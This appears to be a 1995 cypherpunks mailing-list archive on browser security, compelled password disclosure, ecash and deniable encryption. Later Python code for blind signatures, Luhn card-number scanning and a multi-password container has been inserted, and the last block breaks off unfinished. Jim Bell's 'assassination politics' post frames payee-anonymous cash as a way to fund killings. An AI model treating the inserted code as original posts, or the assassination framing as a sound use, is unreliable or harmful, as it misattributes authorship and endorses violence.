Fri, 17 Nov  9:47 AM

----------

   The New York Times, November 17, 1995, p. B8. 


   Penalties Decided in E-Mail at Cornell

   Cornell University has reached agreement with four students
   on punishment for a widely distributed E-mail message they
   wrote listing "75 reasons why women should not have freedom
   of speech." The university rejected harsh penalties like
   suspension because the students did not engage in sexual
   harassment, university officials said yesterday.

   The university had investigated complaints of sexual
   harassment and misuse of computer resources after the
   message made its way on the Internet last month, angering
   thousands of computer users who sent angry responses to the
   four students. The message included the lines, "If she
   can't speak, she can't cry rape" and, "Of course, if she
   can't speak, she can't say no."

   The university said the students had agreed to attend a
   program dealing with date and acquaintance rape, and would
   perform 50 hours of community service.

   -----

   There was a somewhat longer NYT article a day or two ago;
   anybody want it, send your PIN_kie.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Fri, 17 Nov 1995 09:47:26 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <199511162130.KAA04423@paramount.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am "Perry E. Metzger" and I say ...
> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release.  Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting.  Netscape has been shipping the fixed
> > applet security model for over a month(since 2.0Beta1)...
> 
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like.

Well beta2 is heaps better than beta1, I can still crash beta2 with or
without java under win3, sgi, solaris and alpha but it has to be used
for longer and few crashes are repeatable.  Plus lots of new gizmos,
the certificate authority interface (thanks Jeff).

I've got to note just one thing -- what about the Netscape LiveScript
language?  is it opening up the same security can of worms as java?  I
realise that it provides functionality specific to browsing only (no
network/files) but the potential for bugs when you add another
language must increase.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 00:10:48 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <199511171546.KAA17869@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain



>>9. Subject to legal privileges or protection, most legal systems permit
>>investigating authorities to order persons to hand over objects under
>>their control that are required to serve as evidence. In a parallel
>>fashion, provisions should be made for the power to order persons to
>>submit any specified data under their control in a computer system in the
>>form required by the investigating authority.
>>________________________________________________________________________
>
>>Is this 'what we would want'? It clearly means that one can be ordered
>>to reveal the password to encrypted data and punished by law if one
>>refuses.

Forgive me if this point has already been raised, but couldn't an 
objection to such laws be based on the protection against 
self-incrimination? 

Maybe this all depends on whether the legal context is a civil or a 
criminal proceeding. If I'm being sued and they ask me at a deposition
whether I did such-and-such, I can't take the Fifth (or can I?). But 
if I'm accused of murder, the police can't make me tell them where I've 
buried the knife. However, if I have a wall safe and they 
get a warrant to search it, can I be jailed for contempt if I don't 
give them the combination? 

This seems to be a case where existing legal paradigms ought to 
extend rather naturally. Whether the existing paradigms are any 
good or not is of course a separate question. 

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 18 Nov 1995 03:34:04 +0800
To: Arley Carter <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
Message-ID: <199511171905.LAA27110@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15:22 11/16/95 -0500, Arley Carter wrote:
>3.  I'm getting tired of seeing posts to this list about what is more dangerous
>cyberspace or restaurantspace.  Let's focus on the real mechanics of how
>the ground rules of credit card clearing will operate in cyberspace. The
>credit card consortiums can advance the cause of electronic commerce by
>stating in unambiguous terms what their views are of these ground rules.
>Developers, cardholders and merchants can then make a judgement on whether
>those risks are acceptable to each party respectively.  

I agree.  I doubt we can completely eliminate the risk by technical fixes. 
I do think we may be able to reduce the risk below what it is in
non-cyberspace commerce.  (e.g. phone orders and in-person card
presentation).  If we can do that, and a significant part of commerce moves
to cyberspace, then we can see a reduction in the fraud premium that we all
pay (no matter who "officially" pays for it).

While cash-like instruments will be an important part of cyberspace, I
think that credit arrangements may be more important.  In non-cyberspace
commerce, almost all big-ticket purchases are made with time-payment
credit.  Whether the total of the "candy bar" transactions will exceed the
total of the big-ticket transactions, I don't know.  Certainly if we are
dealing with tangible goods, shipping costs encourage large orders.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 03:09:56 +0800
To: sameer <sameer@c2.org>
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <m0tGVUJ-0008xnC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>> 	I will as soon as someone comes up with a _fully_ private digital
>> cash system and starts using it for something. As I understand it, Chaum's
>> ecash system is not one (i.e., non-privacy to the sender and of amounts
>> to the bank). If I'm incorrect, please tell me and I'll set up an account
>> with MTB immediately (if there's a text-based interface).
>
>	ecash provides full payor anonymity. Payee anonymity is
>currently not possible, but that is being worked on. 
>
>	If you used ecash to pay for a c2.org account, neither I nor
>the bank would be able to trace the payment into the c2.org account to
>an actual account at mark twain bank.
>sameer						Voice:   510-601-9777
>Community ConneXion				FAX:     510-601-9734

If you've been following my idea, "assassination politics," you know that
there is an excellent use for payee-anonymous digital cash.  

It seems to me that this should be possible, within limits, if the potential
payee could generate a "blinded" note to be delivered to the payer by
anonymous means.  The payer could get the note certified by the bank,
possibly given an extra "blind" if necessary  (is this possible? Desirable?
Why not?) and then the resulting still-blinded but certified note is posted
(in encrypted form, I suppose) to the 'net so that only the payee can
decrypt and unblind it.
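
The blinded-note exchange sketched in the message above can be written out with textbook RSA blind signatures, including the optional second blind applied by the payer. This is an added example, not code from the post or from DigiCash's ecash; the toy bank key, the function names and the use of SHA-256 as the note hash are assumptions, and double-spend checking at deposit time is not modelled.

```python
import hashlib
import secrets
from math import gcd

# Toy bank key (constructed for this example): two Mersenne primes,
# far too small for real use but enough to run the arithmetic.
P, Q = 2**61 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # bank's private exponent


def note_hash(serial: bytes) -> int:
    """Map a note serial number to an integer mod N (assumed hash)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def random_blind() -> int:
    """Pick a blinding factor that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(value: int, r: int) -> int:
    """Multiply by r^E so the signer cannot recognise the value."""
    return (value * pow(r, E, N)) % N


def unblind(signed: int, r: int) -> int:
    """Divide out r; valid because (x * r^E)^D = x^D * r (mod N)."""
    return (signed * pow(r, -1, N)) % N


def bank_sign(value: int) -> int:
    """The bank signs whatever blinded value it is handed."""
    return pow(value, D, N)


def verify(serial: bytes, signature: int) -> bool:
    """Anyone can check a finished note against the bank's public key."""
    return pow(signature, E, N) == note_hash(serial)


def payee_blinded_payment() -> dict:
    """Run the exchange once and return what each party saw."""
    # Payee: choose the serial and blind it before it leaves their hands.
    serial = secrets.token_bytes(16)
    r_payee = random_blind()
    blinded_note = blind(note_hash(serial), r_payee)

    # Payer: add a second blind so the bank cannot match its withdrawal
    # record against the blinded note that is later posted publicly.
    r_payer = random_blind()
    bank_view = blind(blinded_note, r_payer)
    signed = bank_sign(bank_view)
    posted = unblind(signed, r_payer)   # still blinded by the payee

    # Payee: strip the remaining blind to obtain the bank's signature.
    signature = unblind(posted, r_payee)
    return {
        "serial": serial,
        "signature": signature,
        "blinded_note": blinded_note,
        "bank_view": bank_view,
        "posted": posted,
    }


if __name__ == "__main__":
    run = payee_blinded_payment()
    print("note verifies:", verify(run["serial"], run["signature"]))
    print("bank saw the posted note:", run["bank_view"] == run["blinded_note"])
```

The two blinds compose because each is a plain multiplication mod N, so the payer's factor drops out and leaves exactly the bank's signature on the payee's blinded note.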





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Sat, 18 Nov 1995 00:45:25 +0800
To: cypherpunks@toad.com
Subject: Re: SA: Confidential Communication on the Internet
In-Reply-To: <Pine.SUN.3.90.951117010848.21461A@dfw.net>
Message-ID: <199511171627.LAA17236@fuseki.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"ao" == Aleph One <aleph1@dfw.net> writes:

ao> In the December issue of Scientific American there is an article
ao> by Thomas Beth, "Confidential Communication on the Internet".
ao> Lite on the technical side but good reading anyway.

  This seemed to be a duplication of an X.509 certificate hierarchy:
``Hey, I don't know who you are but you have seals which go back to
a CA I trust.'' In this respect the information seemed unworthy of an
article in SA.

Perhaps I did not read the article closely enough?

michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 18 Nov 1995 17:06:57 +0800
To: don@cs.byu.edu
Subject: Re: Ecash account
In-Reply-To: <199511170930.CAA00682@wero.byu.edu>
Message-ID: <9511171032.AA10628@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes:
 > So who here is going to use their ecash account to set up a money
 > lau^H^H^Hexchange service?

I have one, sort of; the rates are quite high though. It's my casino
( http://www.box.eu.org/~dl/inc/play.shtml )
[If you play an infinite number of times, you will have statistically
received 89% of what you've bet. So it's an 11% fee exchange service
somehow :-)]

For obvious reasons, it works only with CyberBucks though...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Greenpeace Ortega Marxist Qaddafi Chirac Soviet domestic disruption




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Sat, 18 Nov 1995 02:43:00 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <199511171810.MAA09890@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


smithmi@dev.prodigy.com (Michael Smith) said:

>>> 9. Subject to legal privileges or protection, most legal systems
>>> permit investigating authorities to order persons to hand over
>>> objects under their control that are required to serve as
>>> evidence. In a parallel fashion, provisions should be made for the
>>> power to order persons to submit any specified data under their
>>> control in a computer system in the form required by the
>>> investigating authority.
>>> ________________________________________________________________________
>> Is this 'what we would want'? It clearly means that one can be
>> ordered to reveal the password to encrypted data and punished by law
>> if one refuses.

MS> Forgive me if this point has already been raised, but couldn't an
MS> objection to such laws be based on the protection against
MS> self-incrimination?

MS> Maybe this all depends on whether the legal context is a civil or a
MS> criminal proceeding. If I'm being sued and they ask me at a
MS> deposition whether I did such-and-such, I can't take the Fifth (or
MS> can I?). But if I'm accused of murder, the police can't make me tell
MS> them where I've buried the knife. However, if I have a wall safe and
MS> they get a warrant to search it, can I be jailed for contempt if I
MS> don't give them the combination?

	Well, IANAL, but yes, I believe that you can be.  Or, worse,
obstruction of justice.  Especially if they cut it open and find that
the knife was in the safe.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 18 Nov 1995 02:46:33 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511161831.ZM14572@glacius.alias.com>
Message-ID: <9511171814.AA23432@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Frederick B. Cohen writes:
 > This is baloney.  When you work for Netscape or Sun and speak about your
 > company's products, you are representing the company whether you
 > disclaim it or not.

Baloney.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 18 Nov 1995 02:23:12 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <9511171800.AA07897@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Forgive me if this point has already been raised, but couldn't an 
>objection to such laws be based on the protection against 
>self-incrimination? 

There is no such right in most (if not all) european countries. In
France there is not even the presumption of innocence.

The British Conservatives have recently passed a criminal justice
Bill which abolishes the right to silence and most other protections
for the defendant. They are busy writing another.

That is not to say US politicians are any better. Congress is busily 
rolling back on all the protections they can. Got to fill those jails
somehow you know.

	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 18 Nov 1995 02:54:29 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <199511171827.NAA26980@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 	When Postscript allows writing to files, most Web browsers
> become insecure - including Netscape, including HotJava.  If the only
> commonly available postscript programs are insecure, the products have
> hooks designed to allow postscript to be used automatically to interpret
> programs from over the net, and servers commonly provide information in
> postscript format, the enabling technology (i.e., Netscape and Hot Java)
> is responsible for the vulnerability.

   [This is my last response on this subject.] This is a non-sequitur.
Providing hooks for third-party add ons does not make Netscape
responsible for damage done by third party products. If you believe
this is true, find me a legal precedent for it. It doesn't make sense
on a purely intellectual level. If you produce a product that has the
ability to be upgraded, and someone upgrades it with dangerous
third party products, how can you control that? The only way to assure
against it is to not allow upgrades of functionality except by 
your own company. This throws the whole idea of reusable software,
device independence, and building "platforms" right out the window.
It's the kind of logic that seeks to make bars responsible for
drunk drivers. Indeed, Microsoft and Apple should be held responsible
for dangerous "applications" that their computers can execute.

   I don't know anyone who has a postscript viewer configured in Netscape
and I suspect the vast majority of people using Netscape don't even
have the knowledge to do it. Your comments are not significant and
the threat is minor. If you had actually exposed a threat to the
JavaVM/Classloader model, which might be installed on a sizable
portion of browser machines, you might have a point. But since
your postings have made it clear that you haven't read or understood
the Java papers (besides the white paper), nor have you looked at
the actual implementation, your comments are essentially meaningless.
You seem fixated on what is a semantic argument about what "safe"
or "secure" means.  (e.g. your comments on MD5)  You expect these
words to have a binary meaning. Either something is safe/secure or it isn't.

The world is a lot more fuzzy than that.

-Ray









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: viking@pacifier.com (Robert East)
Date: Sat, 18 Nov 1995 06:56:57 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <m0tGYiZ-0008zoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>>MS> However, if I have a wall safe and
>>MS> they get a warrant to search it, can I be jailed for contempt if I
>>MS> don't give them the combination?
>>
>>	Well, IANAL, but yes, I believe that you can be.  Or, worse,
>>obstruction of justice.  Especially if they cut it open and find that
>>the knife was in the safe.
>
>So presumably the same would apply to the password that unlocks my 
>PGP private key. But there's an interesting twist. Once they open 
>up the wall safe, they can see for sure what is and isn't in it. This 
>ain't necessarily so for an encrypted file. Suppose my software has the 
>fiendish sophistication to disgorge different keys depending on what 
>password was given, and different pieces of cleartext depending 
>on what key was used. (Again, I apologize if this notion has already 
>been extensively discussed.) Is there a way to set it up such that 
>the cops couldn't be sure -- even using a logic analyzer -- that I 
>hadn't given them the complete set of keys, so as to read all the 
>cleartexts in the file? Assume that cyphertext files are guaranteed 
>to be larger, by some random factor, than the sum of all the cleartexts 
>in them, so the mere fact that a smaller quantity of cleartext was 
>disgorged than cyphertext supplied would tell them nothing. I guess this 
>is a kind of steganography, isn't it? Or at least something similar -- 
>the point would be that they couldn't tell genuine cyphertext from 
>camouflaging noise, without the key that tells them where to look. 
>
>Which brings us, in turn, to the bottom line: the only things we 
>can be certain the bad guys _won't_ do, are the things they _can't_
>do. 
> 
>
>--Michael Smith

The interesting thing about PGP is that any incriminating cypher text one
might have on his or her hard disk would, most likely, be in someone else's
public key.  So, even if they had your secret key the only thing that could
be uncovered would be cyphertext that someone else had written to you.
Granted, that this could be incriminating but, then again, not necessarily.
I'm sure that for the purposes of conducting a criminal investigation, your
own cyphertext would be far more incriminating than someone else's. (The
above is only true unless you use the single key encryption option offered
for personal files in which case your files would be readable.) 

What one should be more concerned with is sloppy handling of plain text files
used prior to encryption.  A good example of that is if you're using Windows
based applications such as MS Winword.  It has an auto-store function that
generates a "Temp" file.  Such files aren't wiped in the same fashion that PGP
uses when it wipes a text file prior to encryption.

I think that the paramount thing to consider is if you have something to
hide then it is best to store it inside your head.  Any computer based
storage system is bound to have certain limitations that may be bridged by a
determined government agency.  The other alternative is to ensure that
potentially incriminating files be purged regularly to avoid such potential
problems.

Robert East
viking@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 18 Nov 1995 01:45:50 +0800
To: firewalls@greatcircle.com
Subject: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY TOOL
Message-ID: <"swan.cl.cam.:178540:951117141816"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Executive summary
=================

Any non UK site interested in seeing an MBone transmitted seminar on 21st 
November at 16:15 UTC entitled "FIREWALLS AS A NETWORK SECURITY TOOL" should 
contact me to get the IP address and TTL changed.


Plug, caveat, etc
=================

To enable "lone" security researchers (i.e. not enough people in the dept to 
have regular Security Seminars) in the UK to "keep in touch", we transmit our 
departmental Security Seminars on the MBone each week, with a low TTL and 
administratively scoped to the UK (so we don't have to worry about clashing 
with other events. The AC.UK MBone is fully pruning, and typically has spare 
bandwidth).
These are not big formal events, but typically have a dozen or two members of 
the department and other "locals" present.
The termly program is available on the Web in http://www.cl.cam.ac.uk/Seminars
under "Security seminars" [ That way you can see our more formal "Departmental 
Seminars" listing at the same time :-) ]
It's run as a "DIY" service (i.e. members of the group set things up) so 
things may go amiss. However, if they do (or there are time zone problems) it 
is fairly simple to retransmit later (during UK office'ish hours -- unless 
someone has some magic to start up vat and vic or nv without using X) from the 
tape we make ...


Full details
============

As Firewalls are of interest to both these lists (sorry for cross posting!) I 
thought I might take this opportunity to draw your attention to this particular 
seminar. See http://www.cl.cam.ac.uk:80/Seminars/mbone.html for the latest 
info (e.g. slides will appear when I get them), but here is the announcement 
(roughly) as I received it:

                       ***   ***   ***   ***   ***

                  University of Cambridge Computer Laboratory

                            SECURITY SEMINAR SERIES

SPEAKER:	Alec Muffett, Sun Microsystems
DATE:		Tuesday 21st November at 4.15pm
PLACE:		Room TP4, Computer Laboratory
TITLE:		FIREWALLS AS A NETWORK SECURITY TOOL

The "Firewall" - taking the (quite broad) definition of a firewall's
being any device designed (in some manner) to restrict "soft" access
to a network - has migrated from being a tool of the paranoid systems
administrator, into being a standard part of modern network
infrastructures.

This seminar will review why this situation has come about, what
modern firewall architectures (both basic and advanced) look like,
examine what they can/cannot accomplish, and will speculate upon the
future potential of firewalls as access-security devices.


                         ***   ***   ***   ***   ***

As noted above, by default these are normally restricted to UK MBone sites,
so let me know in advance (the M/C IP address changes !) if it is wanted further 
afield.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 04:21:49 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <199511171958.OAA30121@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>>Forgive me if this point has already been raised, but couldn't an 
>>objection to such laws be based on the protection against 
>>self-incrimination? 
>
>There is no such right in most (if not all) european countries. In
>France there is not even the presumption of innocence.

[Further depressing news deleted]

Yes, this was my understanding. I guess the point I was groping 
toward was that while  we could hardly expect that our rights vis-a-vis
electronic privacy would be any _better_ than our rights in 
obviously analogous non-electronic areas, they might well be worse;
it's important to be clear, and to make clear, that what rights 
we have left have obvious extensions to our net.activities, and 
try to prevent the thin end of the wedge from being inserted in 
our portion of the perimeter.

Of course, this only applies to the set of people who live in 
countries where people _have_ any rights, and as Phill implies, 
that may soon be the null set.   

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 07:57:19 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511172312.PAA22826@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

On Wed, 15 Nov 1995, Howard Melman wrote:

> Vladimir Z. Nuri wrote: 
> > attempts to get secure credit card number transfer on the internet are
> > not an end in themselves. they are the first steps toward an entirely
> > new transaction system. those who see a single step and criticize it 
> > as feeble in the context of past systems are missing the point and
> > apparently can't think past the present nanosecond of their lives. 

My grandfather used to say, that the first horse to break from the gate,
isn't necessarily the first to cross the finish line. 

Often, he'll be pulling up the rear.

> You'll have a hard convincing folks that they need something
> better than what works perfectly well today.

In my humble opinion, the present system can't really be characterized as
"working perfectly well".  Far from it.  

While not as familiar with the US system as the Canadian, I can give as a
simple example, the bank clearing system for paper checks.  In Canada, we
can clear a check from one side of the country to the other overnight.  We
have 24 hour clearing.  While this is far from "perfect", our existing
paper systems allow for a degree of efficiency which I don't believe is
engineered into the US clearing system. 

Perhaps someone can correct me, if I have erred but I think it takes far
longer than 24 hours to clear a check drawn on any US bank, and deposited
to any other bank's credit in the United States.  It may work
"functionally" ... but certainly far from "perfectly" nor "efficiently". 

> Here's another point that I didn't see in your list.  Today it might be
> just as safe to send your CC# over the internet as giving it to a clerk,
> etc.  This is mostly because the number of CC#'s sent over the net vs 
> the whole traffic is small.  It is therefore not very cost effective to
> try to steal credit card numbers over the net vs other means (searching
> through dumpsters, taping a phone line near LL Bean, etc.). 

A very good point.  But then, dumpster-diving attacks could be moderated
by simply implementing carbonless forms.  No carbon, reduces a lot of the
risks.  It's basic risk management. 

All of this becomes a part of the cost/benefit analysis, and is part of
the function of security policy.  It's very much like all the talk on
another thread on this list about Java security. 

There is no point in even discussing Java security in Netscape, when
Netscape PRESENTLY has existing security holes written into the very
fabric of the existing installed codebase.  Holes which Netscape and AT&T
refuse to address, correct or even comment on. 

Sun's security approach misses the point.  Putting dead-bolts on houses
while leaving all of the windows open, just doesn't address the problem. 
It really misses the mark. 

> If CC# purchases became common over the net, it would become much more
> valuable to try to steal them from the net and more people would.  It
> would then become much less secure, not for any technical reason but
> because there will be more crooks exploiting the existing flaws. 

This is also unfortunately true.  Information on how to "break" a system
does propagate.  As more people know how to exploit a system, or as more
people learn how to utilize the "letter of the rules" (the "code") rather
than the "spirit" (the "intent") the degree of exploitation grows. 

Ask any executive in the Gaming Industry about this.

Black-Jack card-counting went through an evolution in exactly this
fashion.  Many casinos lost a veritable "fortune" to good card counters. 
They lost to organized "teams" of card counters.  Counters who literally
broke the bank. 

Systems always have exploitable features.  And new systems will always
present new opportunities for exploitation. A completely new set of risks
which are additive to those already in place, even those which may not 
yet be in a state of active exploitation.

A pertinent network example: credit card numbers.

Credit card numbers are not just a set of random digits.  Only particular
patterns of numbers can be valid.  This existing "security provision" --
check digits -- actually ends up opening a security hole when we look at
transmitting credit card numbers via the Internet. 

The security feature on one side of the ledger makes it far easier to
differentiate between what is a random set of numbers, and what is in fact
a valid CC number.  Simple pattern analysis allows one to search for valid
numbers.  

It makes the potential crook's job much easier and it's already engineered 
into the system.  

The "credit card number" risk though is accidental, while the Netscape
Navigator risk isn't accidental at all, it's willful. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
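
Added example, not part of the original post: the check-digit scheme the message refers to is the Luhn algorithm, and the same property lets a defender scan logs or outbound text for card numbers that ended up in the clear. The log lines and numbers below are constructed test values, and the function names are this example's own.

```python
import re
from itertools import product

# A run of 13-19 digits, optionally separated by single spaces or dashes.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Return True if the digit string satisfies the Luhn check."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit, counted from the right
            d *= 2
            if d > 9:
                d -= 9          # same as adding the two digits of the product
        total += d
    return total % 10 == 0


def mask(digits: str) -> str:
    """Keep the first six and last four digits so a report does not leak the number."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def scan(lines):
    """Return (line_number, masked_number) for every Luhn-valid candidate."""
    findings = []
    for number, line in enumerate(lines, 1):
        for match in CANDIDATE.finditer(line):
            digits = re.sub(r"[ -]", "", match.group())
            if luhn_ok(digits):
                findings.append((number, mask(digits)))
    return findings


def luhn_pass_count(length: int) -> int:
    """Count how many of the 10**length digit strings pass the Luhn check."""
    return sum(luhn_ok("".join(p)) for p in product("0123456789", repeat=length))


# Constructed sample input: two well-known test card numbers, one order
# reference that is not a card number, and a fax number that is too short.
SAMPLE_LOG = [
    "17/Nov/1995 POST /order card=4111111111111111 status=ok",
    "17/Nov/1995 POST /order ref=1234567890123456 status=ok",
    "17/Nov/1995 note: customer read out 4012 8888 8888 1881 by phone",
    "17/Nov/1995 fax 301-948-1784 received",
]

if __name__ == "__main__":
    for line_no, masked in scan(SAMPLE_LOG):
        print(f"line {line_no}: possible card number {masked}")
    print("4-digit strings passing Luhn:", luhn_pass_count(4), "of", 10 ** 4)
```

One in ten random digit runs passes the check, so a scanner built this way should treat a match as a candidate for review rather than proof of a leaked card number.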









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 05:06:49 +0800
To: Sten Drescher <cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <199511172019.PAA30181@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


>MS> However, if I have a wall safe and
>MS> they get a warrant to search it, can I be jailed for contempt if I
>MS> don't give them the combination?
>
>	Well, IANAL, but yes, I believe that you can be.  Or, worse,
>obstruction of justice.  Especially if they cut it open and find that
>the knife was in the safe.

So presumably the same would apply to the password that unlocks my 
PGP private key. But there's an interesting twist. Once they open 
up the wall safe, they can see for sure what is and isn't in it. This 
ain't necessarily so for an encrypted file. Suppose my software has the 
fiendish sophistication to disgorge different keys depending on what 
password was given, and different pieces of cleartext depending 
on what key was used. (Again, I apologize if this notion has already 
been extensively discussed.) Is there a way to set it up such that 
the cops couldn't be sure -- even using a logic analyzer -- that I 
hadn't given them the complete set of keys, so as to read all the 
cleartexts in the file? Assume that cyphertext files are guaranteed 
to be larger, by some random factor, than the sum of all the cleartexts 
in them, so the mere fact that a smaller quantity of cleartext was 
disgorged than cyphertext supplied would tell them nothing. I guess this 
is a kind of steganography, isn't it? Or at least something similar -- 
the point would be that they couldn't tell genuine cyphertext from 
camouflaging noise, without the key that tells them where to look. 

Which brings us, in turn, to the bottom line: the only things we 
can be certain the bad guys _won't_ do, are the things they _can't_
do. 
 

--Michael Smith
  smithmi@dev.prodigy.com
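
Added example, not from the thread: a toy container of the kind the message asks about, in which each password opens a different cleartext and every unused slot is random noise. The slot layout and function names are assumptions of this example, and HMAC-SHA256 in counter mode stands in for a stream cipher so that it runs with the Python standard library only.

```python
import hashlib
import hmac
import secrets
import struct

SALT, NONCE, TAG = 16, 16, 32
SLOT_BODY = 64                      # padded cleartext bytes per slot
SLOT = NONCE + SLOT_BODY + TAG      # every slot has the same size
N_SLOTS = 8                         # fixed, whatever the number of secrets


def _keys(password: str, salt: bytes):
    """Derive separate encryption and MAC keys from a password.
    The iteration count is kept low so the example runs quickly."""
    k = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000, dklen=64)
    return k[:32], k[32:]


def _keystream(enc_key: bytes, nonce: bytes, n: int) -> bytes:
    """HMAC-SHA256 in counter mode, used here as a stand-in stream cipher."""
    out, counter = b"", 0
    while len(out) < n:
        block = nonce + struct.pack(">I", counter)
        out += hmac.new(enc_key, block, hashlib.sha256).digest()
        counter += 1
    return out[:n]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def build(entries: dict) -> bytes:
    """entries maps password -> cleartext bytes. Returns the container."""
    if len(entries) > N_SLOTS:
        raise ValueError("more secrets than slots")
    salt = secrets.token_bytes(SALT)
    # Start with pure noise; filled slots overwrite some of it.
    slots = [secrets.token_bytes(SLOT) for _ in range(N_SLOTS)]
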